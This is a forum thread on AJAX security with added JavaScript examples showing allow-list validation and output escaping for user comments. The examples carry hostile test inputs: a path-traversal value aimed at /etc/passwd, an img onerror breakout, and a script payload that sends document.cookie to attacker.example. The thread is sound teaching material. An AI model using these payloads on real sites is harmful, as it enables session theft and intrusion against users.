Thread: Is AJAX hackable?

  1. #1

    Hi,

    I want to make some part of a website in AJAX, but I heard that it is hackable, so is there any way to make it more secure? I have been using server-based scripts until now, but AJAX is faster.

    Thanks

  2. #2

    It depends upon what you're doing with it. All JavaScript is hackable, in that a person may use the browser's console or scratch pad to inject their own code into the AJAX call. But this only means that they may post or get with it whatever they want from your domain's public areas. Security of those items is your responsibility. For example, if your AJAX code runs a PHP script or page that includes something based upon what's sent via AJAX, make sure that only certain values are actionable: don't allow it to include, say, any file; give options as to which among a selection of files it might include. If it sends email, give a selection of email addresses in the PHP part that it may send to based upon what AJAX passes it; do not allow it to send to any email address that's passed from AJAX. Those sorts of things.

    For your particular application, ask yourself the question, "If I wanted to use this to do something other than what it's intended to do, by changing the data sent with the call, what could I make it do?" Keep in mind that if your call is a POST, it could be changed to include GET data or to be only GET, and vice versa. And of course the data sent can be changed to anything the would-be hacker chooses.

    This is not all that different from an ordinary form submission or a server-side link with a query string. A hacker may make up their own link or form and pass/submit it to your PHP page or script. If that PHP code will do anything the form or link tells it to do, you could have trouble.
    Last edited by jscheuer1; 08-29-2013 at 03:04 PM. Reason: add info
    - John
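    The pattern John describes, as an added example that is not code from this thread: a server-side handler (written in Node-style JavaScript rather than PHP so it runs stand-alone) that never acts on a raw client value, but maps a short key onto a fixed allow-list of includable pages and mail recipients, reads parameters only from the body of a POST, and ignores anything arriving as a query string. The action names, page paths and mail addresses are assumptions made for the example.

```javascript
'use strict';
// Added example, not code from the thread: a server-side handler for an AJAX
// endpoint that maps every client-supplied value onto a fixed allow-list, so
// that tampering with the request in the browser console changes nothing the
// server was not already willing to do. The action names, page paths and
// mail addresses are illustrative assumptions.

// Pages the endpoint may include. The client sends a short key, never a path,
// so a value such as "../../etc/passwd" can never reach the filesystem.
const INCLUDABLE_PAGES = Object.freeze({
  about: 'pages/about.html',
  contact: 'pages/contact.html',
});

// Mail recipients the endpoint may send to, keyed the same way.
const MAIL_RECIPIENTS = Object.freeze({
  sales: 'sales@example.com',
  support: 'support@example.com',
});

// Resolve a client-supplied key against an allow-list. hasOwnProperty (rather
// than `key in table`) keeps inherited names such as "constructor" or
// "__proto__" from passing as valid keys.
function lookupAllowed(table, key) {
  if (typeof key !== 'string') return null;
  if (!Object.prototype.hasOwnProperty.call(table, key)) return null;
  return table[key];
}

// The request as the server sees it. The page's JavaScript is meant to POST a
// JSON body, but an attacker can just as easily send GET with a query string,
// or both; the handler therefore reads parameters only from the body of a
// POST and never consults req.query.
function handleAjaxRequest(req) {
  if (req.method !== 'POST') {
    return { status: 405, error: 'POST required' };
  }
  let body;
  try {
    body = JSON.parse(req.body);
  } catch (e) {
    return { status: 400, error: 'invalid JSON body' };
  }
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { status: 400, error: 'expected a JSON object' };
  }

  switch (body.action) {
    case 'include': {
      const path = lookupAllowed(INCLUDABLE_PAGES, body.page);
      if (path === null) return { status: 400, error: 'unknown page' };
      return { status: 200, include: path };
    }
    case 'mail': {
      const to = lookupAllowed(MAIL_RECIPIENTS, body.to);
      if (to === null) return { status: 400, error: 'unknown recipient' };
      // Free text is accepted but bounded; it is a message body, never a header.
      const message = typeof body.message === 'string' ? body.message.slice(0, 2000) : '';
      return { status: 200, mailTo: to, message };
    }
    default:
      return { status: 400, error: 'unknown action' };
  }
}

// Builds the request the way the page's own AJAX code would send it.
function postJson(obj) {
  return { method: 'POST', query: {}, body: JSON.stringify(obj) };
}

// The intended call, then three tampered versions aimed at the same endpoint.
const results = {
  legit: handleAjaxRequest(postJson({ action: 'include', page: 'about' })),
  traversal: handleAjaxRequest(postJson({ action: 'include', page: '../../etc/passwd' })),
  spam: handleAjaxRequest(postJson({ action: 'mail', to: 'victim@example.net', message: 'buy now' })),
  viaGet: handleAjaxRequest({ method: 'GET', query: { action: 'include', page: 'about' }, body: '' }),
};
console.log(results);
```

    Only the first call succeeds; the traversal and the arbitrary recipient are rejected because the key is not in the table, and the GET variant is refused before any parameter is read. The same shape carries over to PHP directly: an associative array as the allow-list, `isset($table[$key])` as the lookup, and `$_POST` read only when `$_SERVER['REQUEST_METHOD']` is POST.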

  3. #3

    Ajax is a way to combine server-side and client-side code. Client-side code is inherently insecure, at least because it can be modified by the client. But that doesn't mean it can be "hacked" by someone else, any more than anything else on their computer could be hacked.
    Server-side code, generally, can't be hacked, because it operates on the server; of course your server could be hacked.
    So then there's a question of whether the content requested by Ajax is actually the content you receive. But since both ends aren't really possible to change without access to the user's computer or your server, I don't see why this would be a problem.

    So in theory, no. But there are always possibilities of anything having a security problem. For example, someone could guess your admin password and change settings on your server.

    The most common kind of attack would be one in which you allow comments or other kinds of content modification from users; then they could add in some potentially harmful JavaScript (including Ajax) code so that visitors would have code they (and you) don't want on the page.

    The only "security" feature in Ajax is that cross-domain requests (e.g., Ajax code on Google asking to load content from Yahoo) are blocked in most (all modern) browsers. That's generally helpful in preventing (such as in user comments) outside content from being loaded.
    So in addition to what John said, we'll need more info about exactly what you're doing with the code and what vulnerabilities it might have. In general, there isn't too much to worry about, beyond normal security precautions.
    Daniel
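    The comment scenario Daniel raises, as an added example that is not code from this thread: the same comment template rendered once by dropping stored user content straight into the markup and once with every untrusted value HTML-escaped at output time, so that a script tag a commenter submits is displayed as text rather than run. The comment records and the `containsForeignTag` check are constructed for the demonstration; in a real page the equivalent is to build nodes with `textContent` and never assign untrusted strings to `innerHTML`.

```javascript
'use strict';
// Added example, not code from the thread: rendering user-submitted comments so
// that script a commenter includes is displayed as text instead of executed.
// The comment records below are constructed for the demonstration.

// Escape the characters that change meaning in HTML text or inside a quoted
// attribute value. Applied at output time, to every untrusted string.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The mistake: stored user content dropped straight into markup.
function renderCommentUnsafe(comment) {
  return `<div class="comment" data-author="${comment.author}">` +
         `<b>${comment.author}</b>: ${comment.body}</div>`;
}

// The fix: the same template, with every untrusted value escaped on the way out.
function renderCommentSafe(comment) {
  return `<div class="comment" data-author="${escapeHtml(comment.author)}">` +
         `<b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.body)}</div>`;
}

// Constructed comments: one ordinary, one carrying a script tag in the text
// context, one that tries to break out of the attribute context instead.
const COMMENTS = [
  { author: 'alice', body: 'Nice script, thanks!' },
  { author: 'mallory', body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
  { author: '"><img src=x onerror=alert(1)>', body: 'hi' },
];

function renderAll(renderer) {
  return COMMENTS.map(renderer).join('\n');
}

// Crude check used only for the demonstration: does the output contain any tag
// other than the <div> and <b> the template itself emits?
function containsForeignTag(html) {
  const allowed = /^(div|\/div|b|\/b)\b/i;
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.some((t) => !allowed.test(t.slice(1)));
}

console.log('unsafe output contains a foreign tag:', containsForeignTag(renderAll(renderCommentUnsafe)));
console.log('safe output contains a foreign tag:  ', containsForeignTag(renderAll(renderCommentSafe)));
```

    The unsafe renderer emits both the `<script>` element and the `<img onerror>` that escaped the attribute; the safe renderer emits only the template's own tags, with the payloads visible as literal text. Escaping covers the HTML text and quoted-attribute contexts used here; a value placed into a URL, a `<script>` block or an event-handler attribute needs the encoding for that context instead.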
